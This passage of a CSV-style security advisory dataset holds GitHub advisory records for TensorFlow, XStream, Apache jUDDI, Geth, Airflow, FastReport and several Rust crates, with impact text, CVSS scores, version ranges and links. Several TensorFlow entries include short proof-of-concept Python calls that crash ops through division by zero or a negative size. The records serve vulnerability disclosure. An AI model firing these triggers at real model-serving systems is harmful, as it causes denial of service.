'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37690'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ee119d4a498979525046fba1c3dd3f13a039fbb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:16:10Z', 'nvd_published_at': '2021-08-13T00:15:00Z'}" +1.4.0,GHSA-9c8h-2mv3-49ww,2021-08-24T15:41:50Z,2021-08-25T14:41:29Z,,['CVE-2021-37675'],Division by 0 in most convolution operators,"### Impact +Most implementations of convolution operators in TensorFlow are affected by a division by 0 vulnerability where an attacker can trigger a denial of service via a crash: + +```python +import tensorflow as tf + +tf.compat.v1.disable_v2_behavior() +tf.raw_ops.Conv2D( + input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), + filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32), + strides = [1, 1, 1, 1], + padding = ""SAME"") +``` + +The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/framework/common_shape_fns.cc#L577) is missing several validations before doing divisions and modulo operations. + +### Patches +We have patched the issue in GitHub commit [8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4](https://github.com/tensorflow/tensorflow/commit/8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9c8h-2mv3-49ww'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37675'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8a793b5d7f59e37ac7f3cd0954a750a2fe76bad4'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:41:50Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-f9xr-3m55-5q2v,2023-06-13T17:07:43Z,2021-08-25T20:56:14Z,,['CVE-2020-36466'],Data races in cgc,An issue was discovered in the cgc crate through 2020-12-10 for Rust. Ptr implements Send and Sync for all types,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cgc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36466'}, {'type': 'WEB', 'url': 'https://github.com/playXE/cgc/issues/5'}, {'type': 'PACKAGE', 'url': 'https://github.com/playXE/cgc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0148.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:12:10Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-9hx8-2mrv-r674,2021-08-31T21:02:02Z,2021-08-09T20:41:37Z,,['CVE-2021-37578'],Deserialization of Untrusted Data in Apache jUDDI,"Apache jUDDI uses several classes related to Java's Remote Method Invocation (RMI) which (as an extension to UDDI) provides an alternate transport for accessing UDDI services. + +RMI uses the default Java serialization mechanism to pass parameters in RMI invocations. A remote attacker can send a malicious serialized object to the above RMI entries. The objects get deserialized without any check on the incoming data. In the worst case, it may let the attacker run arbitrary code remotely. + +For both jUDDI web service applications and jUDDI clients, the usage of RMI is disabled by default. Since this is an optional feature and an extension to the UDDI protocol, the likelihood of impact is low. Starting with 3.3.10, all RMI related code was removed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.juddi:juddi-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37578'}, {'type': 'WEB', 'url': 'https://github.com/apache/juddi/commit/dd880ffe7694a70cee75efeee79c9197d261866f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/juddi'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r82047b3ba774cf870ea8e1e9ec51c6107f6cd056d4e36608148c6e71%40%3Cprivate.juddi.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/07/29/1'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:16:42Z', 'nvd_published_at': '2021-07-29T07:15:00Z'}" +1.4.0,GHSA-9856-9gg9-qcmq,2023-08-29T18:53:25Z,2021-08-30T16:15:41Z,,['CVE-2021-39137'],Ethereum Contains Consensus Flaw During Block Processing,"### Impact + +A vulnerability in the Geth EVM could cause a node to reject the canonical chain. + +### Description + +A memory-corruption bug within the EVM can cause a consensus error, where vulnerable nodes obtain a different `stateRoot` when processing a maliciously crafted transaction. This, in turn, would lead to the chain being split in two forks. + +All Geth versions supporting the London hard fork are vulnerable (which predates London), so all users should update. + +This bug was exploited on Mainnet at block 13107518, leading to a minority chain split. + +### Patches + +A patch is included in the `v1.10.8` release. +The exact patch to fix the issue is contained within this [commit](https://github.com/ethereum/go-ethereum/pull/23381/commits/4d4879cafd1b3c906fc184a8c4a357137465128f) + +### Workarounds + +No workarounds exist, save to update and/or apply the patch commit. + +### References. + +Post-mortem [write-up](https://github.com/ethereum/go-ethereum/blob/master/docs/postmortems/2021-08-22-split-postmortem.md). + +### Credits + +The bug was found by @guidovranken (working for [Sentnl](https://sentnl.io/) during an audit of the [Telos EVM](https://www.telos.net/evm)) and reported via bounty@ethereum.org. + +### For more information +If you have any questions or comments about this advisory: + +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum/) +* Email us at [security@ethereum.org](mailto:security@ethereum.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-9856-9gg9-qcmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39137'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/23381/commits/4d4879cafd1b3c906fc184a8c4a357137465128f'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.10.8'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0254'}]","{'cwe_ids': ['CWE-436'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:08:22Z', 'nvd_published_at': '2021-08-24T16:15:00Z'}" +1.4.0,GHSA-xw4p-crpj-vjx2,2022-02-08T20:43:14Z,2021-08-25T14:46:59Z,,['CVE-2021-39152'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact +The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.18. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39152](https://x-stream.github.io/CVE-2021-39152.html). + +### Credits +m0d9 of the Security Team of Alibaba Cloud found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39152'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39152.html'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:29Z', 'nvd_published_at': '2021-08-23T19:15:00Z'}" +1.4.0,GHSA-v726-3vg9-cp34,2021-07-26T18:29:52Z,2021-08-02T17:28:16Z,,['CVE-2020-27998'],Missing Authorization in FastReport,"An issue was discovered in FastReport before 2020.4.0. It lacks a ScriptSecurity feature and therefore may mishandle (for example) GetType, typeof, TypeOf, DllImport, LoadLibrary, and GetProcAddress.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'FastReport.OpenSource'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2020.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27998'}, {'type': 'WEB', 'url': 'https://github.com/FastReports/FastReport/pull/206'}, {'type': 'WEB', 'url': 'https://github.com/FastReports/FastReport/compare/v2020.3.0...v2020.4.0'}, {'type': 'WEB', 'url': 'https://opensource.fast-report.com/2020/09/report-script-security.html'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-143-FastReportsInc-FastReports'}]","{'cwe_ids': ['CWE-862'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:29:52Z', 'nvd_published_at': '2020-10-29T18:15:00Z'}" +1.4.0,GHSA-686f-ch3r-xwmh,2021-08-24T17:47:59Z,2021-08-25T20:58:17Z,,['CVE-2020-36436'],Data races in unicycle,"Affected versions of this crate unconditionally implemented `Send` & `Sync` for types `PinSlab` & `Unordered`. This allows sending non-Send types to other threads and concurrently accessing non-Sync types from multiple threads. + +This can result in a data race & memory corruption when types that provide internal mutability without synchronization are contained within `PinSlab` or `Unordered` and accessed concurrently from multiple threads. + +The flaw was corrected in commits 92f40b4 & 6a6c367 by adding trait bound `T: Send` to `Send` impls for `PinSlab` & `Unordered` and adding `T: Sync` to `Sync` impls for `PinSlab` & `Unordered`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'unicycle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36436'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/6a6c367a0c25f86f998fa315ea90c328f685b194'}, {'type': 'WEB', 'url': 'https://github.com/udoprog/unicycle/commit/92f40b4a2c671553dfa96feacff0265206c44ce5'}, {'type': 'PACKAGE', 'url': 'https://github.com/udoprog/unicycle'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/unicycle/RUSTSEC-2020-0116.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0116.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:15:26Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-327x-39hh-65wf,2023-06-13T16:45:04Z,2021-08-25T20:55:09Z,,['CVE-2021-29930'],Out of bounds write in arenavec,An issue was discovered in the arenavec crate through 0.1.1. A drop of uninitialized memory can sometimes occur upon a panic in T::default(),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arenavec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29930'}, {'type': 'WEB', 'url': 'https://github.com/ibabushkin/arenavec/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/ibabushkin/arenavec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0040.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:04:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-8jrj-525p-826v,2022-07-29T18:10:22Z,2021-08-25T14:48:12Z,,['CVE-2021-39145'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39145](https://x-stream.github.io/CVE-2021-39145.html). + +### Credits +李安诺 (Li4n0) from Alibaba Cloud Security Team and Smi1e of DBAPPSecurity WEBIN Lab found and reported the issue independently to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-8jrj-525p-826v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39145'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39145.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:10Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-q9h2-4xhf-23xx,2022-06-07T21:31:41Z,2021-08-25T20:51:36Z,,['CVE-2020-36204'],Data races in im,"An issue was discovered in the im crate prior to 15.1.0 for Rust. Because TreeFocus does not have bounds on its Send trait or Sync trait, a data race can occur.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'im'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '15.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36204'}, {'type': 'WEB', 'url': 'https://github.com/bodil/im-rs/issues/157'}, {'type': 'WEB', 'url': 'https://github.com/bodil/im-rs/pull/158'}, {'type': 'WEB', 'url': 'https://github.com/bodil/im-rs/commit/0b3a7b228b0fe70446393f55c8b893f349f3f6bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/im-rs'}, {'type': 'WEB', 'url': 'https://github.com/bodil/im-rs/releases/tag/v15.1.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0096.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:49:57Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-m6h2-jx9v-58w6,2021-08-26T15:44:06Z,2021-08-30T16:25:57Z,,['CVE-2021-35936'],Missing Authorization in Apache Airflow,"If remote logging is not used, the worker (in the case of CeleryExecutor) or the scheduler (in the case of LocalExecutor) runs a Flask logging server and is listening on a specific port and also binds on 0.0.0.0 by default. This logging server had no authentication and allows reading log files of DAG jobs. This issue affects Apache Airflow < 2.1.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35936'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r53d6bd7b0a66f92ddaf1313282f10fec802e71246606dd30c16536df%40%3Cusers.airflow.apache.org%3E'}]","{'cwe_ids': ['CWE-306', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:44:06Z', 'nvd_published_at': '2021-08-16T08:15:00Z'}" +1.4.0,GHSA-6rhx-hqxm-8p36,2021-08-19T21:19:45Z,2021-08-25T20:46:44Z,,['CVE-2019-25009'],Double free in http,"An issue was discovered in the http crate before 0.1.20 for Rust. The HeaderMap::Drain API can use a raw pointer, defeating soundness.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'http'}, 'ecosystem_specific': {'affected_functions': ['http::header::HeaderMap::drain']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25009'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0034.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:19:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-vmjw-c2vp-p33c,2021-08-24T14:21:16Z,2021-08-25T14:42:03Z,,['CVE-2021-37669'],Crash in NMS ops caused by integer conversion to unsigned,"### Impact +An attacker can cause denial of service in applications serving models using `tf.raw_ops.NonMaxSuppressionV5` by triggering a division by 0: + +```python +import tensorflow as tf + +tf.raw_ops.NonMaxSuppressionV5( + boxes=[[0.1,0.1,0.1,0.1],[0.2,0.2,0.2,0.2],[0.3,0.3,0.3,0.3]], + scores=[1.0,2.0,3.0], + max_output_size=-1, + iou_threshold=0.5, + score_threshold=0.5, + soft_nms_sigma=1.0, + pad_to_max_output_size=True) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/image/non_max_suppression_op.cc#L170-L271) uses a user controlled argument to resize a `std::vector`: + +```cc + const int output_size = max_output_size.scalar()(); + // ... + std::vector selected; + // ... + if (pad_to_max_output_size) { + selected.resize(output_size, 0); + // ... + } +``` + +However, as `std::vector::resize` takes the size argument as a `size_t` and `output_size` is an `int`, there is an implicit conversion to usigned. If the attacker supplies a negative value, this conversion results in a crash. + +A similar issue occurs in `CombinedNonMaxSuppression`: + +```python +import tensorflow as tf + +tf.raw_ops.NonMaxSuppressionV5( + boxes=[[[[0.1,0.1,0.1,0.1],[0.2,0.2,0.2,0.2],[0.3,0.3,0.3,0.3]],[[0.1,0.1,0.1,0.1],[0.2,0.2,0.2,0.2],[0.3,0.3,0.3,0.3]],[[0.1,0.1,0.1,0.1],[0.2,0.2,0.2,0.2],[0.3,0.3,0.3,0.3]]]], + scores=[[[1.0,2.0,3.0],[1.0,2.0,3.0],[1.0,2.0,3.0]]], + max_output_size_per_class=-1, + max_total_size=10, + iou_threshold=score_threshold=0.5, + pad_per_class=True, + clip_boxes=True) +``` + +### Patches +We have patched the issue in GitHub commit [3a7362750d5c372420aa8f0caf7bf5b5c3d0f52d](https://github.com/tensorflow/tensorflow/commit/3a7362750d5c372420aa8f0caf7bf5b5c3d0f52d) and commit [b5cdbf12ffcaaffecf98f22a6be5a64bb96e4f58](https://github.com/tensorflow/tensorflow/commit/b5cdbf12ffcaaffecf98f22a6be5a64bb96e4f58). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vmjw-c2vp-p33c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37669'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3a7362750d5c372420aa8f0caf7bf5b5c3d0f52d'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b5cdbf12ffcaaffecf98f22a6be5a64bb96e4f58'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:21:16Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-7xwj-5r4v-429p,2021-08-24T16:30:14Z,2021-08-25T14:40:35Z,,['CVE-2021-37681'],NPE in TFLite,"### Impact +The implementation of SVDF in TFLite is [vulnerable to a null pointer error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/svdf.cc#L300-L313): + +```cc + TfLiteTensor* state = GetVariableInput(context, node, kStateTensor); + // ... + GetTensorData(state) +``` + +The [`GetVariableInput` 